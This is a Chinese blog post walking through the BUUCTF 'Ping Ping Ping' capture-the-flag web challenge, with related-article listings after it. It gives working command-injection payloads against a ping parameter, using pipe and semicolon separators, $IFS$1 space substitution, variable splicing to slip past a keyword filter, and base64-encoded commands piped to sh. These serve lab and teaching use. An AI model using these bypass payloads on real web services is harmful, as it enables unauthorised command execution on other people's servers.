BUU-WEB-Ping Ping Ping

最新推荐文章于 2023-11-28 09:26:26 发布
最新推荐文章于 2023-11-28 09:26:26 发布
阅读量151 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116295695
版权
本文档详细记录了一次通过变量替代和编码转换来绕过过滤机制,成功访问并显示隐藏的flag.php文件的过程。从尝试构建基础payload,到逐步排除被过滤的字符和命令,最终通过变量a的赋值拼接出完整flag的路径。同时,还探讨了使用base64编码来避免过滤的方法,虽然由于bash被过滤而未能实现,但展示了另一种可能的思路。源代码中的变量利用是解决问题的关键。
摘要由CSDN通过智能技术生成

BUU-WEB-Ping Ping Ping

根据页面提示,首先尝试构建payload

....?ip=127.0.0.1

在这里插入图片描述
尝试构建通过管道符构建payload

?ip=127.0.0.1|ls

在这里插入图片描述
发现flag.php,所以目标就是打开这个网页。
构建payload

?ip=127.0.0.1|cat flag.php

在这里插入图片描述
发现被过滤了。
尝试利用$IFS$1代替空格符。
构建payload

?ip=127.0.0.1|cat$IFS$1flag.php

在这里插入图片描述

依旧被过滤了。
(难道是flag被过滤了,尝试一下index可不可以)
构建payload

?ip=127.0.0.1|cat$IFS$1index.php

在这里插入图片描述
查看index主页,发现flag被过滤。
看了也别人的wp,发现最简单的方法就是变量替代。
为什么可以利用变量替代呢,因为源码中有个变量a。
在这里插入图片描述
通过给它赋值,在拼接字符串构建flag。

?ip=127.0.0.1;a=f;cat$IFS$1$alag.php    过滤
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php	没flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php  	过滤
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php	有flag

还有一种方法就是通过base64加密,再解密执行。

cat /flag

base64加密为

Y2F0IC9mbGFn

payload为

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash

|bash就是执行前面的脚本。
但是这里bash被过滤了,用sh替换,目的一样,为了执行前面的脚本。
payload为:

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

flag在源码的注释里。
在这里插入图片描述

flag{ae544713-19dc-4697-99d3-ee11d53e54b1}
TzZzEZ-web
关注
专栏目录
BUU CTF [GXYCTF2019]Ping Ping Ping 1
qiaopeifan的博客
01-26 474
BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=1 1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用 注:%20(space)、%09(t
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5146
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
BUU pingpingping WP
weixin_62472121的博客
06-01 560
buuctf pingpingping wp
buu webPing Ping Ping(命令执行)
m0_55378150的博客
04-07 778
打开靶机,提示get传参 直接?ip=127.0.0.1 返回ping的结果,接着试一下命令执行?ip=127.0.0.1|ls 发现疑似flag的flag.php,试一下能不能直接读出来?ip=127.0.0.1|cat flag.php 果然没这么简单,空格被过滤了,百度了一下绕过的方法 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt 挨个试一下,发现..
BUUCTF——ping ping ping
最新发布
weixin_62248541的博客
11-28 312
BUUCTF——ping ping ping
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2772
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3439
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
java tracert_Java模拟Tracert和ping命令实现跃点追踪
weixin_35705450的博客
02-15 1922
1. Tracert(跟踪路由)用于确定 IP数据包访问目标所采取的路径。Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP错误消息来确定从一个Host到网络上其他主机的Routertracert命令能够显示你的数据包在网络上进行传输时经历的一个个大大小小的ISP的路由器。2.PING(Packet Internet Groper),即因特网包探索器。可以用来测试网络连接...
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3542
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
javascript模拟的Ping效果代码 (Web Ping
10-28
JS虽然发送不了真正Ping的ICMP数据包,但Ping的本质仍然是请求/回复的时间差,HTTP自然可以实现此功能.
ping测试源码(仅IE)
01-28
经本人亲测,仅IE有效哦,将代码粘贴到html页面即可,欢迎下载!
基于socket实现Ping功能的源代码
08-10
基于socket的网络编程技术,用到SOCK_RAW的原始套接字类型。里面对简单ICMP协议和IP协议有着很完整的诠释和定义。可以交流zhaquanmin@163.com
buuctf:Ping Ping Ping(命令执行)
zzqzzq11的博客
08-06 1340
buuctf
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6949
BUUCTFWP,关于一些waf的绕过
BUU 命令执行-[GXYCTF2019]Ping Ping Ping
Ivyyyyyy1的博客
11-07 248
一、题目 总有些题喜欢打着ping的名义,做着命令执行的事 我们便先pingping罢 没什么异常 这里根据经验,猜测是用到了shell_exec()、exec()等等这种函数 二、解题 我们在ip的参数值里面加入管道符 | ,即把 | 之前的命令输出结果作为 | 之后的命令参数 而 ls 不存在参数,所以不会被影响 这样我们查到了flag文件就在目录下 直接cat出来 这里根据返回的结果来看,后台应该是把空格过滤了 查了一下知乎上面绕过空格过滤的方法 ...
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 330
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值